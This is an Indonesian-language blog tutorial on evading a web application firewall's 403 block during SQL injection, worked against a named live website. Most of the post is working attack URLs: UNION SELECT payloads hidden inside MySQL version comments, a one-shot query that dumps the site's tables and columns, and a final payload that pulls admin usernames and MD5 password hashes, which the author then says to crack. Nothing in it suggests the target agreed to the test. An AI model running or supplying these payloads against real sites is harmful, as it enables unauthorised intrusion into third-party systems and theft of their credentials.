--> Skip to main content

Cara Bypass Sql Injection 403 Forbidden


Mumpung ada target nih, di postingan kali ini gw mau ngejelasin tutorial bagaimana Cara Bypass Sql Injection 403 Forbidden.

Oke langsung saja, disini gw udah ada target dan berikut target gue,
https://tisplanet.com/service-item.php?id=3

Di penjelasan kali ini gw ga akan ngejelasin sedetail mungkin.
Karena ditutorial ini mungkin kalian sudah pada paham basic sqli, jadi langsung ke inti permasalahannya saja ya.

    Oke baiklah kita lanjutkan, gw asumsikan udah ke tahap union+select
    Gue disini setelah melakukan order+by untuk mendapatkan jumlah column dan ketika mau masukan query union+select ternyata malah kena security waf 403 Forbidden.


    Untuk cara bypassnya cukup kita menambahkan beberapa karakter mysql-comments. Di target gw disini yang kena waf di union+select jadi kita tinggal menambahkan beberapa karakter mysql-comments,

    Contoh,
    union+select
    Kita tambahkan mysql-commentsnya jadi,

    /*!union*/+/*!select*/
    /*!12345union*/+/*!12345select*/

    Nahh jadi contohnya seperti ini,

    https://tisplanet.com/service-item.php?id=-3'+/*!union*/+/*!select*/+1,2,3,4,5,6,7,8--+

    Lihat digambar dibawah ini, bypassed.


    Terus kalo udah tau angka magicknya yang keluar, selanjutnya tinggal masukan diosnya. Gue pilih angka 4 untuk dikasih dios berikut perintah lengkapnya,

    https://tisplanet.com/service-item.php?id=-3'+/*!union*/+/*!select*/+1,2,3,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),5,6,7,8--+

    Kena 403 Forbidden lagi anjirr mari kita bypass.


    Oke berarti yang harus dibypass adalah diosnya, karena tadi pas mau dikasih dios malah kena waf 403 forbidden.

    Untuk bypass diosnya sama seperti waktu bypass union+select tinggal menambahkan karakter mysql-comments. Lebih jelasnya seperti ini,

    https://tisplanet.com/service-item.php?id=-3'+/*!union*/+/*!select*/+1,2,3,/*!12345make_set*/(6,@:=0x0a,(select(1)/*!12345from*/(/*!12345information_schema.columns*/)where@:=make_set(511,@,0x3c6c693e,/*!12345table_name*/,/*!12345column_name*/)),@),5,6,7,8--+


    Bypass sukses, lihat gambar diatas gan.

    Selanjutnya tinggal ngedump username beserta passwordnya seperti ini,

    https://tisplanet.com/service-item.php?id=-3'+/*!union*/+/*!select*/+1,2,3,/*!12345make_set*/(6,@:=0x0a,(select(1)/*!12345from*/(/*!12345admin_login*/)where@:=make_set(511,@,0x3c6c693e,/*!12345username*/,/*!12345password*/)),@),5,6,7,8--+


    Nah tuh keluar user dan passnya tapi password masih terenkripsi jenis md5, jadi harus dicrak atau hash biar bisa mengetahui password yang aslinya.

    Oke sekian dulu dari gue, semoga bermanfaat.
    Comment Policy: Silahkan tuliskan komentar Anda yang sesuai dengan topik postingan halaman ini. Komentar yang berisi tautan tidak akan ditampilkan sebelum disetujui.
    Buka Komentar
    Tutup Komentar